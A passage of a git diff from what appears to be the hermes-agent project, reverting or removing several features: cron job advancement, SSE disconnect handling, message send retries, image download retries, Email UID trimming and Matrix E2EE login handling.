kind = job.get("schedule", {}).get("kind")
|
||||
if kind not in ("cron", "interval"):
|
||||
return False
|
||||
now = _hermes_now().isoformat()
|
||||
new_next = compute_next_run(job["schedule"], now)
|
||||
if new_next and new_next != job.get("next_run_at"):
|
||||
job["next_run_at"] = new_next
|
||||
save_jobs(jobs)
|
||||
return True
|
||||
return False
|
||||
return False
|
||||
|
||||
|
||||
def get_due_jobs() -> List[Dict[str, Any]]:
|
||||
"""Get all jobs that are due to run now.
|
||||
|
||||
|
||||
+1
-7
@@ -35,7 +35,7 @@ logger = logging.getLogger(__name__)
|
||||
# Add parent directory to path for imports
|
||||
sys.path.insert(0, str(Path(__file__).parent.parent))
|
||||
|
||||
from cron.jobs import get_due_jobs, mark_job_run, save_job_output, advance_next_run
|
||||
from cron.jobs import get_due_jobs, mark_job_run, save_job_output
|
||||
|
||||
# Sentinel: when a cron agent has nothing new to report, it can start its
|
||||
# response with this marker to suppress delivery. Output is still saved
|
||||
@@ -524,12 +524,6 @@ def tick(verbose: bool = True) -> int:
|
||||
executed = 0
|
||||
for job in due_jobs:
|
||||
try:
|
||||
# For recurring jobs (cron/interval), advance next_run_at to the
|
||||
# next future occurrence BEFORE execution. This way, if the
|
||||
# process crashes mid-run, the job won't re-fire on restart.
|
||||
# One-shot jobs are left alone so they can retry on restart.
|
||||
advance_next_run(job["id"])
|
||||
|
||||
success, output, final_response, error = run_job(job)
|
||||
|
||||
output_file = save_job_output(job["id"], output)
|
||||
|
||||
+13
-3
@@ -101,11 +101,21 @@ Available methods:
|
||||
|
||||
### Patches (`patches.py`)
|
||||
|
||||
**Problem**: Some hermes-agent tools use `asyncio.run()` internally (e.g., the Modal backend). This crashes when called from inside Atropos's event loop because `asyncio.run()` cannot be nested.
|
||||
**Problem**: Some hermes-agent tools use `asyncio.run()` internally (e.g., the Modal backend via SWE-ReX). This crashes when called from inside Atropos's event loop because `asyncio.run()` cannot be nested.
|
||||
|
||||
**Solution**: `ModalEnvironment` uses a dedicated `_AsyncWorker` background thread with its own event loop. The calling code sees a sync interface, but internally all async Modal SDK calls happen on the worker thread so they don't conflict with Atropos's loop. This is built directly into `tools/environments/modal.py` — no monkey-patching required.
|
||||
**Solution**: `patches.py` monkey-patches `SwerexModalEnvironment` to use a dedicated background thread (`_AsyncWorker`) with its own event loop. The calling code sees the same sync interface, but internally the async work happens on a separate thread that doesn't conflict with Atropos's loop.
|
||||
|
||||
`patches.py` is now a no-op (kept for backward compatibility with imports).
|
||||
What gets patched:
|
||||
- `SwerexModalEnvironment.__init__` -- creates Modal deployment on a background thread
|
||||
- `SwerexModalEnvironment.execute` -- runs commands on the same background thread
|
||||
- `SwerexModalEnvironment.stop` -- stops deployment on the background thread
|
||||
|
||||
The patches are:
|
||||
- **Idempotent** -- calling `apply_patches()` multiple times is safe
|
||||
- **Transparent** -- same interface and behavior, only the internal async execution changes
|
||||
- **Universal** -- works identically in normal CLI use (no running event loop)
|
||||
|
||||
Applied automatically at import time by `hermes_base_env.py`.
|
||||
|
||||
### Tool Call Parsers (`tool_call_parsers/`)
|
||||
|
||||
|
||||
@@ -601,14 +601,6 @@ def _apply_env_overrides(config: GatewayConfig) -> None:
|
||||
config.platforms[Platform.TELEGRAM] = PlatformConfig()
|
||||
config.platforms[Platform.TELEGRAM].reply_to_mode = telegram_reply_mode
|
||||
|
||||
telegram_fallback_ips = os.getenv("TELEGRAM_FALLBACK_IPS", "")
|
||||
if telegram_fallback_ips:
|
||||
if Platform.TELEGRAM not in config.platforms:
|
||||
config.platforms[Platform.TELEGRAM] = PlatformConfig()
|
||||
config.platforms[Platform.TELEGRAM].extra["fallback_ips"] = [
|
||||
ip.strip() for ip in telegram_fallback_ips.split(",") if ip.strip()
|
||||
]
|
||||
|
||||
telegram_home = os.getenv("TELEGRAM_HOME_CHANNEL")
|
||||
if telegram_home and Platform.TELEGRAM in config.platforms:
|
||||
config.platforms[Platform.TELEGRAM].home_channel = HomeChannel(
|
||||
|
||||
+65
-106
@@ -166,7 +166,7 @@ class ResponseStore:
|
||||
|
||||
_CORS_HEADERS = {
|
||||
"Access-Control-Allow-Methods": "GET, POST, DELETE, OPTIONS",
|
||||
"Access-Control-Allow-Headers": "Authorization, Content-Type, Idempotency-Key",
|
||||
"Access-Control-Allow-Headers": "Authorization, Content-Type",
|
||||
}
|
||||
|
||||
|
||||
@@ -366,20 +366,14 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
Create an AIAgent instance using the gateway's runtime config.
|
||||
|
||||
Uses _resolve_runtime_agent_kwargs() to pick up model, api_key,
|
||||
base_url, etc. from config.yaml / env vars. Toolsets are resolved
|
||||
from config.yaml platform_toolsets.api_server (same as all other
|
||||
gateway platforms), falling back to the hermes-api-server default.
|
||||
base_url, etc. from config.yaml / env vars.
|
||||
"""
|
||||
from run_agent import AIAgent
|
||||
from gateway.run import _resolve_runtime_agent_kwargs, _resolve_gateway_model, _load_gateway_config
|
||||
from hermes_cli.tools_config import _get_platform_tools
|
||||
from gateway.run import _resolve_runtime_agent_kwargs, _resolve_gateway_model
|
||||
|
||||
runtime_kwargs = _resolve_runtime_agent_kwargs()
|
||||
model = _resolve_gateway_model()
|
||||
|
||||
user_config = _load_gateway_config()
|
||||
enabled_toolsets = sorted(_get_platform_tools(user_config, "api_server"))
|
||||
|
||||
max_iterations = int(os.getenv("HERMES_MAX_ITERATIONS", "90"))
|
||||
|
||||
agent = AIAgent(
|
||||
@@ -389,7 +383,7 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
quiet_mode=True,
|
||||
verbose_logging=False,
|
||||
ephemeral_system_prompt=ephemeral_system_prompt or None,
|
||||
enabled_toolsets=enabled_toolsets,
|
||||
enabled_toolsets=["hermes-api-server"],
|
||||
session_id=session_id,
|
||||
platform="api_server",
|
||||
stream_delta_callback=stream_delta_callback,
|
||||
@@ -495,21 +489,17 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
if delta is not None:
|
||||
_stream_q.put(delta)
|
||||
|
||||
# Start agent in background. agent_ref is a mutable container
|
||||
# so the SSE writer can interrupt the agent on client disconnect.
|
||||
agent_ref = [None]
|
||||
# Start agent in background
|
||||
agent_task = asyncio.ensure_future(self._run_agent(
|
||||
user_message=user_message,
|
||||
conversation_history=history,
|
||||
ephemeral_system_prompt=system_prompt,
|
||||
session_id=session_id,
|
||||
stream_delta_callback=_on_delta,
|
||||
agent_ref=agent_ref,
|
||||
))
|
||||
|
||||
return await self._write_sse_chat_completion(
|
||||
request, completion_id, model_name, created, _stream_q,
|
||||
agent_task, agent_ref,
|
||||
request, completion_id, model_name, created, _stream_q, agent_task
|
||||
)
|
||||
|
||||
# Non-streaming: run the agent (with optional Idempotency-Key)
|
||||
@@ -572,14 +562,9 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
|
||||
async def _write_sse_chat_completion(
|
||||
self, request: "web.Request", completion_id: str, model: str,
|
||||
created: int, stream_q, agent_task, agent_ref=None,
|
||||
created: int, stream_q, agent_task,
|
||||
) -> "web.StreamResponse":
|
||||
"""Write real streaming SSE from agent's stream_delta_callback queue.
|
||||
|
||||
If the client disconnects mid-stream (network drop, browser tab close),
|
||||
the agent is interrupted via ``agent.interrupt()`` so it stops making
|
||||
LLM API calls, and the asyncio task wrapper is cancelled.
|
||||
"""
|
||||
"""Write real streaming SSE from agent's stream_delta_callback queue."""
|
||||
import queue as _q
|
||||
|
||||
response = web.StreamResponse(
|
||||
@@ -588,87 +573,69 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
)
|
||||
await response.prepare(request)
|
||||
|
||||
try:
|
||||
# Role chunk
|
||||
role_chunk = {
|
||||
"id": completion_id, "object": "chat.completion.chunk",
|
||||
"created": created, "model": model,
|
||||
"choices": [{"index": 0, "delta": {"role": "assistant"}, "finish_reason": None}],
|
||||
}
|
||||
await response.write(f"data: {json.dumps(role_chunk)}\n\n".encode())
|
||||
# Role chunk
|
||||
role_chunk = {
|
||||
"id": completion_id, "object": "chat.completion.chunk",
|
||||
"created": created, "model": model,
|
||||
"choices": [{"index": 0, "delta": {"role": "assistant"}, "finish_reason": None}],
|
||||
}
|
||||
await response.write(f"data: {json.dumps(role_chunk)}\n\n".encode())
|
||||
|
||||
# Stream content chunks as they arrive from the agent
|
||||
loop = asyncio.get_event_loop()
|
||||
while True:
|
||||
try:
|
||||
delta = await loop.run_in_executor(None, lambda: stream_q.get(timeout=0.5))
|
||||
except _q.Empty:
|
||||
if agent_task.done():
|
||||
# Drain any remaining items
|
||||
while True:
|
||||
try:
|
||||
delta = stream_q.get_nowait()
|
||||
if delta is None:
|
||||
break
|
||||
content_chunk = {
|
||||
"id": completion_id, "object": "chat.completion.chunk",
|
||||
"created": created, "model": model,
|
||||
"choices": [{"index": 0, "delta": {"content": delta}, "finish_reason": None}],
|
||||
}
|
||||
await response.write(f"data: {json.dumps(content_chunk)}\n\n".encode())
|
||||
except _q.Empty:
|
||||
break
|
||||
break
|
||||
continue
|
||||
|
||||
if delta is None: # End of stream sentinel
|
||||
break
|
||||
|
||||
content_chunk = {
|
||||
"id": completion_id, "object": "chat.completion.chunk",
|
||||
"created": created, "model": model,
|
||||
"choices": [{"index": 0, "delta": {"content": delta}, "finish_reason": None}],
|
||||
}
|
||||
await response.write(f"data: {json.dumps(content_chunk)}\n\n".encode())
|
||||
|
||||
# Get usage from completed agent
|
||||
usage = {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0}
|
||||
# Stream content chunks as they arrive from the agent
|
||||
loop = asyncio.get_event_loop()
|
||||
while True:
|
||||
try:
|
||||
result, agent_usage = await agent_task
|
||||
usage = agent_usage or usage
|
||||
except Exception:
|
||||
pass
|
||||
delta = await loop.run_in_executor(None, lambda: stream_q.get(timeout=0.5))
|
||||
except _q.Empty:
|
||||
if agent_task.done():
|
||||
# Drain any remaining items
|
||||
while True:
|
||||
try:
|
||||
delta = stream_q.get_nowait()
|
||||
if delta is None:
|
||||
break
|
||||
content_chunk = {
|
||||
"id": completion_id, "object": "chat.completion.chunk",
|
||||
"created": created, "model": model,
|
||||
"choices": [{"index": 0, "delta": {"content": delta}, "finish_reason": None}],
|
||||
}
|
||||
await response.write(f"data: {json.dumps(content_chunk)}\n\n".encode())
|
||||
except _q.Empty:
|
||||
break
|
||||
break
|
||||
continue
|
||||
|
||||
# Finish chunk
|
||||
finish_chunk = {
|
||||
if delta is None: # End of stream sentinel
|
||||
break
|
||||
|
||||
content_chunk = {
|
||||
"id": completion_id, "object": "chat.completion.chunk",
|
||||
"created": created, "model": model,
|
||||
"choices": [{"index": 0, "delta": {}, "finish_reason": "stop"}],
|
||||
"usage": {
|
||||
"prompt_tokens": usage.get("input_tokens", 0),
|
||||
"completion_tokens": usage.get("output_tokens", 0),
|
||||
"total_tokens": usage.get("total_tokens", 0),
|
||||
},
|
||||
"choices": [{"index": 0, "delta": {"content": delta}, "finish_reason": None}],
|
||||
}
|
||||
await response.write(f"data: {json.dumps(finish_chunk)}\n\n".encode())
|
||||
await response.write(b"data: [DONE]\n\n")
|
||||
except (ConnectionResetError, ConnectionAbortedError, BrokenPipeError, OSError):
|
||||
# Client disconnected mid-stream. Interrupt the agent so it
|
||||
# stops making LLM API calls at the next loop iteration, then
|
||||
# cancel the asyncio task wrapper.
|
||||
agent = agent_ref[0] if agent_ref else None
|
||||
if agent is not None:
|
||||
try:
|
||||
agent.interrupt("SSE client disconnected")
|
||||
except Exception:
|
||||
pass
|
||||
if not agent_task.done():
|
||||
agent_task.cancel()
|
||||
try:
|
||||
await agent_task
|
||||
except (asyncio.CancelledError, Exception):
|
||||
pass
|
||||
logger.info("SSE client disconnected; interrupted agent task %s", completion_id)
|
||||
await response.write(f"data: {json.dumps(content_chunk)}\n\n".encode())
|
||||
|
||||
# Get usage from completed agent
|
||||
usage = {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0}
|
||||
try:
|
||||
result, agent_usage = await agent_task
|
||||
usage = agent_usage or usage
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Finish chunk
|
||||
finish_chunk = {
|
||||
"id": completion_id, "object": "chat.completion.chunk",
|
||||
"created": created, "model": model,
|
||||
"choices": [{"index": 0, "delta": {}, "finish_reason": "stop"}],
|
||||
"usage": {
|
||||
"prompt_tokens": usage.get("input_tokens", 0),
|
||||
"completion_tokens": usage.get("output_tokens", 0),
|
||||
"total_tokens": usage.get("total_tokens", 0),
|
||||
},
|
||||
}
|
||||
await response.write(f"data: {json.dumps(finish_chunk)}\n\n".encode())
|
||||
await response.write(b"data: [DONE]\n\n")
|
||||
|
||||
return response
|
||||
|
||||
@@ -1171,18 +1138,12 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
ephemeral_system_prompt: Optional[str] = None,
|
||||
session_id: Optional[str] = None,
|
||||
stream_delta_callback=None,
|
||||
agent_ref: Optional[list] = None,
|
||||
) -> tuple:
|
||||
"""
|
||||
Create an agent and run a conversation in a thread executor.
|
||||
|
||||
Returns ``(result_dict, usage_dict)`` where *usage_dict* contains
|
||||
``input_tokens``, ``output_tokens`` and ``total_tokens``.
|
||||
|
||||
If *agent_ref* is a one-element list, the AIAgent instance is stored
|
||||
at ``agent_ref[0]`` before ``run_conversation`` begins. This allows
|
||||
callers (e.g. the SSE writer) to call ``agent.interrupt()`` from
|
||||
another thread to stop in-progress LLM calls.
|
||||
"""
|
||||
loop = asyncio.get_event_loop()
|
||||
|
||||
@@ -1192,8 +1153,6 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
session_id=session_id,
|
||||
stream_delta_callback=stream_delta_callback,
|
||||
)
|
||||
if agent_ref is not None:
|
||||
agent_ref[0] = agent
|
||||
result = agent.run_conversation(
|
||||
user_message=user_message,
|
||||
conversation_history=conversation_history,
|
||||
|
||||
+25
-136
@@ -8,7 +8,6 @@ and implement the required methods.
|
||||
import asyncio
|
||||
import logging
|
||||
import os
|
||||
import random
|
||||
import re
|
||||
import uuid
|
||||
from abc import ABC, abstractmethod
|
||||
@@ -72,51 +71,31 @@ def cache_image_from_bytes(data: bytes, ext: str = ".jpg") -> str:
|
||||
return str(filepath)
|
||||
|
||||
|
||||
async def cache_image_from_url(url: str, ext: str = ".jpg", retries: int = 2) -> str:
|
||||
async def cache_image_from_url(url: str, ext: str = ".jpg") -> str:
|
||||
"""
|
||||
Download an image from a URL and save it to the local cache.
|
||||
|
||||
Retries on transient failures (timeouts, 429, 5xx) with exponential
|
||||
backoff so a single slow CDN response doesn't lose the media.
|
||||
Uses httpx for async download with a reasonable timeout.
|
||||
|
||||
Args:
|
||||
url: The HTTP/HTTPS URL to download from.
|
||||
ext: File extension including the dot (e.g. ".jpg", ".png").
|
||||
retries: Number of retry attempts on transient failures.
|
||||
|
||||
Returns:
|
||||
Absolute path to the cached image file as a string.
|
||||
"""
|
||||
import asyncio
|
||||
import httpx
|
||||
import logging as _logging
|
||||
_log = _logging.getLogger(__name__)
|
||||
|
||||
last_exc = None
|
||||
async with httpx.AsyncClient(timeout=30.0, follow_redirects=True) as client:
|
||||
for attempt in range(retries + 1):
|
||||
try:
|
||||
response = await client.get(
|
||||
url,
|
||||
headers={
|
||||
"User-Agent": "Mozilla/5.0 (compatible; HermesAgent/1.0)",
|
||||
"Accept": "image/*,*/*;q=0.8",
|
||||
},
|
||||
)
|
||||
response.raise_for_status()
|
||||
return cache_image_from_bytes(response.content, ext)
|
||||
except (httpx.TimeoutException, httpx.HTTPStatusError) as exc:
|
||||
last_exc = exc
|
||||
if isinstance(exc, httpx.HTTPStatusError) and exc.response.status_code < 429:
|
||||
raise
|
||||
if attempt < retries:
|
||||
wait = 1.5 * (attempt + 1)
|
||||
_log.debug("Media cache retry %d/%d for %s (%.1fs): %s",
|
||||
attempt + 1, retries, url[:80], wait, exc)
|
||||
await asyncio.sleep(wait)
|
||||
continue
|
||||
raise
|
||||
raise last_exc
|
||||
response = await client.get(
|
||||
url,
|
||||
headers={
|
||||
"User-Agent": "Mozilla/5.0 (compatible; HermesAgent/1.0)",
|
||||
"Accept": "image/*,*/*;q=0.8",
|
||||
},
|
||||
)
|
||||
response.raise_for_status()
|
||||
return cache_image_from_bytes(response.content, ext)
|
||||
|
||||
|
||||
def cleanup_image_cache(max_age_hours: int = 24) -> int:
|
||||
@@ -350,24 +329,6 @@ class SendResult:
|
||||
message_id: Optional[str] = None
|
||||
error: Optional[str] = None
|
||||
raw_response: Any = None
|
||||
retryable: bool = False # True for transient errors (network, timeout) — base will retry automatically
|
||||
|
||||
|
||||
# Error substrings that indicate a transient network failure worth retrying
|
||||
_RETRYABLE_ERROR_PATTERNS = (
|
||||
"connecterror",
|
||||
"connectionerror",
|
||||
"connectionreset",
|
||||
"connectionrefused",
|
||||
"timeout",
|
||||
"timed out",
|
||||
"network",
|
||||
"broken pipe",
|
||||
"remotedisconnected",
|
||||
"eoferror",
|
||||
"readtimeout",
|
||||
"writetimeout",
|
||||
)
|
||||
|
||||
|
||||
# Type for message handlers
|
||||
@@ -872,91 +833,6 @@ class BasePlatformAdapter(ABC):
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
@staticmethod
|
||||
def _is_retryable_error(error: Optional[str]) -> bool:
|
||||
"""Return True if the error string looks like a transient network failure."""
|
||||
if not error:
|
||||
return False
|
||||
lowered = error.lower()
|
||||
return any(pat in lowered for pat in _RETRYABLE_ERROR_PATTERNS)
|
||||
|
||||
async def _send_with_retry(
|
||||
self,
|
||||
chat_id: str,
|
||||
content: str,
|
||||
reply_to: Optional[str] = None,
|
||||
metadata: Any = None,
|
||||
max_retries: int = 2,
|
||||
base_delay: float = 2.0,
|
||||
) -> "SendResult":
|
||||
"""
|
||||
Send a message with automatic retry for transient network errors.
|
||||
|
||||
On permanent failures (e.g. formatting / permission errors) falls back
|
||||
to a plain-text version before giving up. If all attempts fail due to
|
||||
network errors, sends the user a brief delivery-failure notice so they
|
||||
know to retry rather than waiting indefinitely.
|
||||
"""
|
||||
|
||||
result = await self.send(
|
||||
chat_id=chat_id,
|
||||
content=content,
|
||||
reply_to=reply_to,
|
||||
metadata=metadata,
|
||||
)
|
||||
|
||||
if result.success:
|
||||
return result
|
||||
|
||||
error_str = result.error or ""
|
||||
is_network = result.retryable or self._is_retryable_error(error_str)
|
||||
|
||||
if is_network:
|
||||
# Retry with exponential backoff for transient errors
|
||||
for attempt in range(1, max_retries + 1):
|
||||
delay = base_delay * (2 ** (attempt - 1)) + random.uniform(0, 1)
|
||||
logger.warning(
|
||||
"[%s] Send failed (attempt %d/%d, retrying in %.1fs): %s",
|
||||
self.name, attempt, max_retries, delay, error_str,
|
||||
)
|
||||
await asyncio.sleep(delay)
|
||||
result = await self.send(
|
||||
chat_id=chat_id,
|
||||
content=content,
|
||||
reply_to=reply_to,
|
||||
metadata=metadata,
|
||||
)
|
||||
if result.success:
|
||||
logger.info("[%s] Send succeeded on retry %d", self.name, attempt)
|
||||
return result
|
||||
error_str = result.error or ""
|
||||
if not (result.retryable or self._is_retryable_error(error_str)):
|
||||
break # error switched to non-transient — fall through to plain-text fallback
|
||||
else:
|
||||
# All retries exhausted (loop completed without break) — notify user
|
||||
logger.error("[%s] Failed to deliver response after %d retries: %s", self.name, max_retries, error_str)
|
||||
notice = (
|
||||
"\u26a0\ufe0f Message delivery failed after multiple attempts. "
|
||||
"Please try again \u2014 your request was processed but the response could not be sent."
|
||||
)
|
||||
try:
|
||||
await self.send(chat_id=chat_id, content=notice, reply_to=reply_to, metadata=metadata)
|
||||
except Exception as notify_err:
|
||||
logger.debug("[%s] Could not send delivery-failure notice: %s", self.name, notify_err)
|
||||
return result
|
||||
|
||||
# Non-network / post-retry formatting failure: try plain text as fallback
|
||||
logger.warning("[%s] Send failed: %s — trying plain-text fallback", self.name, error_str)
|
||||
fallback_result = await self.send(
|
||||
chat_id=chat_id,
|
||||
content=f"(Response formatting failed, plain text:)\n\n{content[:3500]}",
|
||||
reply_to=reply_to,
|
||||
metadata=metadata,
|
||||
)
|
||||
if not fallback_result.success:
|
||||
logger.error("[%s] Fallback send also failed: %s", self.name, fallback_result.error)
|
||||
return fallback_result
|
||||
|
||||
async def handle_message(self, event: MessageEvent) -> None:
|
||||
"""
|
||||
Process an incoming message.
|
||||
@@ -1106,13 +982,26 @@ class BasePlatformAdapter(ABC):
|
||||
# Send the text portion
|
||||
if text_content:
|
||||
logger.info("[%s] Sending response (%d chars) to %s", self.name, len(text_content), event.source.chat_id)
|
||||
result = await self._send_with_retry(
|
||||
result = await self.send(
|
||||
chat_id=event.source.chat_id,
|
||||
content=text_content,
|
||||
reply_to=event.message_id,
|
||||
metadata=_thread_metadata,
|
||||
)
|
||||
|
||||
# Log send failures (don't raise - user already saw tool progress)
|
||||
if not result.success:
|
||||
print(f"[{self.name}] Failed to send response: {result.error}")
|
||||
# Try sending without markdown as fallback
|
||||
fallback_result = await self.send(
|
||||
chat_id=event.source.chat_id,
|
||||
content=f"(Response formatting failed, plain text:)\n\n{text_content[:3500]}",
|
||||
reply_to=event.message_id,
|
||||
metadata=_thread_metadata,
|
||||
)
|
||||
if not fallback_result.success:
|
||||
print(f"[{self.name}] Fallback send also failed: {fallback_result.error}")
|
||||
|
||||
# Human-like pacing delay between text and media
|
||||
human_delay = self._get_human_delay()
|
||||
|
||||
|
||||
@@ -2096,11 +2096,6 @@ class DiscordAdapter(BasePlatformAdapter):
|
||||
if pending_text_injection:
|
||||
event_text = f"{pending_text_injection}\n\n{event_text}" if event_text else pending_text_injection
|
||||
|
||||
# Defense-in-depth: prevent empty user messages from entering session
|
||||
# (can happen when user sends @mention-only with no other text)
|
||||
if not event_text or not event_text.strip():
|
||||
event_text = "(The user sent a message with no text content)"
|
||||
|
||||
event = MessageEvent(
|
||||
text=event_text,
|
||||
message_type=msg_type,
|
||||
|
||||
@@ -213,7 +213,6 @@ class EmailAdapter(BasePlatformAdapter):
|
||||
|
||||
# Track message IDs we've already processed to avoid duplicates
|
||||
self._seen_uids: set = set()
|
||||
self._seen_uids_max: int = 2000 # cap to prevent unbounded memory growth
|
||||
self._poll_task: Optional[asyncio.Task] = None
|
||||
|
||||
# Map chat_id (sender email) -> last subject + message-id for threading
|
||||
@@ -221,26 +220,6 @@ class EmailAdapter(BasePlatformAdapter):
|
||||
|
||||
logger.info("[Email] Adapter initialized for %s", self._address)
|
||||
|
||||
def _trim_seen_uids(self) -> None:
|
||||
"""Keep only the most recent UIDs to prevent unbounded memory growth.
|
||||
|
||||
IMAP UIDs are monotonically increasing integers. When the set grows
|
||||
beyond the cap, we keep only the highest half — old UIDs are safe to
|
||||
drop because new messages always have higher UIDs and IMAP's UNSEEN
|
||||
flag prevents re-delivery regardless.
|
||||
"""
|
||||
if len(self._seen_uids) <= self._seen_uids_max:
|
||||
return
|
||||
try:
|
||||
# UIDs are bytes like b'1234' — sort numerically and keep top half
|
||||
sorted_uids = sorted(self._seen_uids, key=lambda u: int(u))
|
||||
keep = self._seen_uids_max // 2
|
||||
self._seen_uids = set(sorted_uids[-keep:])
|
||||
logger.debug("[Email] Trimmed seen UIDs to %d entries", len(self._seen_uids))
|
||||
except (ValueError, TypeError):
|
||||
# Fallback: just clear old entries if sort fails
|
||||
self._seen_uids = set(list(self._seen_uids)[-self._seen_uids_max // 2:])
|
||||
|
||||
async def connect(self) -> bool:
|
||||
"""Connect to the IMAP server and start polling for new messages."""
|
||||
try:
|
||||
@@ -253,8 +232,6 @@ class EmailAdapter(BasePlatformAdapter):
|
||||
if status == "OK" and data and data[0]:
|
||||
for uid in data[0].split():
|
||||
self._seen_uids.add(uid)
|
||||
# Keep only the most recent UIDs to prevent unbounded growth
|
||||
self._trim_seen_uids()
|
||||
imap.logout()
|
||||
logger.info("[Email] IMAP connection test passed. %d existing messages skipped.", len(self._seen_uids))
|
||||
except Exception as e:
|
||||
@@ -325,9 +302,6 @@ class EmailAdapter(BasePlatformAdapter):
|
||||
if uid in self._seen_uids:
|
||||
continue
|
||||
self._seen_uids.add(uid)
|
||||
# Trim periodically to prevent unbounded memory growth
|
||||
if len(self._seen_uids) > self._seen_uids_max:
|
||||
self._trim_seen_uids()
|
||||
|
||||
status, msg_data = imap.uid("fetch", uid, "(RFC822)")
|
||||
if status != "OK":
|
||||
|
||||
+21
-135
@@ -161,49 +161,22 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
# Authenticate.
|
||||
if self._access_token:
|
||||
client.access_token = self._access_token
|
||||
|
||||
# With access-token auth, always resolve whoami so we validate the
|
||||
# token and learn the device_id. The device_id matters for E2EE:
|
||||
# without it, matrix-nio can send plain messages but may fail to
|
||||
# decrypt inbound encrypted events or encrypt outbound room sends.
|
||||
resp = await client.whoami()
|
||||
if isinstance(resp, nio.WhoamiResponse):
|
||||
resolved_user_id = getattr(resp, "user_id", "") or self._user_id
|
||||
resolved_device_id = getattr(resp, "device_id", "")
|
||||
if resolved_user_id:
|
||||
self._user_id = resolved_user_id
|
||||
|
||||
# restore_login() is the matrix-nio path that binds the access
|
||||
# token to a specific device and loads the crypto store.
|
||||
if resolved_device_id and hasattr(client, "restore_login"):
|
||||
client.restore_login(
|
||||
self._user_id or resolved_user_id,
|
||||
resolved_device_id,
|
||||
self._access_token,
|
||||
)
|
||||
# Resolve user_id if not set.
|
||||
if not self._user_id:
|
||||
resp = await client.whoami()
|
||||
if isinstance(resp, nio.WhoamiResponse):
|
||||
self._user_id = resp.user_id
|
||||
client.user_id = resp.user_id
|
||||
logger.info("Matrix: authenticated as %s", self._user_id)
|
||||
else:
|
||||
if self._user_id:
|
||||
client.user_id = self._user_id
|
||||
if resolved_device_id:
|
||||
client.device_id = resolved_device_id
|
||||
client.access_token = self._access_token
|
||||
if self._encryption:
|
||||
logger.warning(
|
||||
"Matrix: access-token login did not restore E2EE state; "
|
||||
"encrypted rooms may fail until a device_id is available"
|
||||
)
|
||||
|
||||
logger.info(
|
||||
"Matrix: using access token for %s%s",
|
||||
self._user_id or "(unknown user)",
|
||||
f" (device {resolved_device_id})" if resolved_device_id else "",
|
||||
)
|
||||
logger.error(
|
||||
"Matrix: whoami failed — check MATRIX_ACCESS_TOKEN and MATRIX_HOMESERVER"
|
||||
)
|
||||
await client.close()
|
||||
return False
|
||||
else:
|
||||
logger.error(
|
||||
"Matrix: whoami failed — check MATRIX_ACCESS_TOKEN and MATRIX_HOMESERVER"
|
||||
)
|
||||
await client.close()
|
||||
return False
|
||||
client.user_id = self._user_id
|
||||
logger.info("Matrix: using access token for %s", self._user_id)
|
||||
elif self._password and self._user_id:
|
||||
resp = await client.login(
|
||||
self._password,
|
||||
@@ -221,18 +194,13 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
return False
|
||||
|
||||
# If E2EE is enabled, load the crypto store.
|
||||
if self._encryption and getattr(client, "olm", None):
|
||||
if self._encryption and hasattr(client, "olm"):
|
||||
try:
|
||||
if client.should_upload_keys:
|
||||
await client.keys_upload()
|
||||
logger.info("Matrix: E2EE crypto initialized")
|
||||
except Exception as exc:
|
||||
logger.warning("Matrix: crypto init issue: %s", exc)
|
||||
elif self._encryption:
|
||||
logger.warning(
|
||||
"Matrix: E2EE requested but crypto store is not loaded; "
|
||||
"encrypted rooms may fail"
|
||||
)
|
||||
|
||||
# Register event callbacks.
|
||||
client.add_event_callback(self._on_room_message, nio.RoomMessageText)
|
||||
@@ -262,7 +230,6 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
)
|
||||
# Build DM room cache from m.direct account data.
|
||||
await self._refresh_dm_cache()
|
||||
await self._run_e2ee_maintenance()
|
||||
else:
|
||||
logger.warning("Matrix: initial sync returned %s", type(resp).__name__)
|
||||
|
||||
@@ -334,48 +301,13 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
relates_to["m.in_reply_to"] = {"event_id": reply_to}
|
||||
msg_content["m.relates_to"] = relates_to
|
||||
|
||||
async def _room_send_once(*, ignore_unverified_devices: bool = False):
|
||||
return await asyncio.wait_for(
|
||||
self._client.room_send(
|
||||
chat_id,
|
||||
"m.room.message",
|
||||
msg_content,
|
||||
ignore_unverified_devices=ignore_unverified_devices,
|
||||
),
|
||||
timeout=45,
|
||||
)
|
||||
|
||||
try:
|
||||
resp = await _room_send_once(ignore_unverified_devices=False)
|
||||
except Exception as exc:
|
||||
retryable = isinstance(exc, asyncio.TimeoutError)
|
||||
olm_unverified = getattr(nio, "OlmUnverifiedDeviceError", None)
|
||||
send_retry = getattr(nio, "SendRetryError", None)
|
||||
if isinstance(olm_unverified, type) and isinstance(exc, olm_unverified):
|
||||
retryable = True
|
||||
if isinstance(send_retry, type) and isinstance(exc, send_retry):
|
||||
retryable = True
|
||||
|
||||
if not retryable:
|
||||
logger.error("Matrix: failed to send to %s: %s", chat_id, exc)
|
||||
return SendResult(success=False, error=str(exc))
|
||||
|
||||
logger.warning(
|
||||
"Matrix: initial encrypted send to %s failed (%s); "
|
||||
"retrying after E2EE maintenance with ignored unverified devices",
|
||||
chat_id,
|
||||
exc,
|
||||
)
|
||||
await self._run_e2ee_maintenance()
|
||||
try:
|
||||
resp = await _room_send_once(ignore_unverified_devices=True)
|
||||
except Exception as retry_exc:
|
||||
logger.error("Matrix: failed to send to %s after retry: %s", chat_id, retry_exc)
|
||||
return SendResult(success=False, error=str(retry_exc))
|
||||
|
||||
resp = await self._client.room_send(
|
||||
chat_id,
|
||||
"m.room.message",
|
||||
msg_content,
|
||||
)
|
||||
if isinstance(resp, nio.RoomSendResponse):
|
||||
last_event_id = resp.event_id
|
||||
logger.info("Matrix: sent event %s to %s", last_event_id, chat_id)
|
||||
else:
|
||||
err = getattr(resp, "message", str(resp))
|
||||
logger.error("Matrix: failed to send to %s: %s", chat_id, err)
|
||||
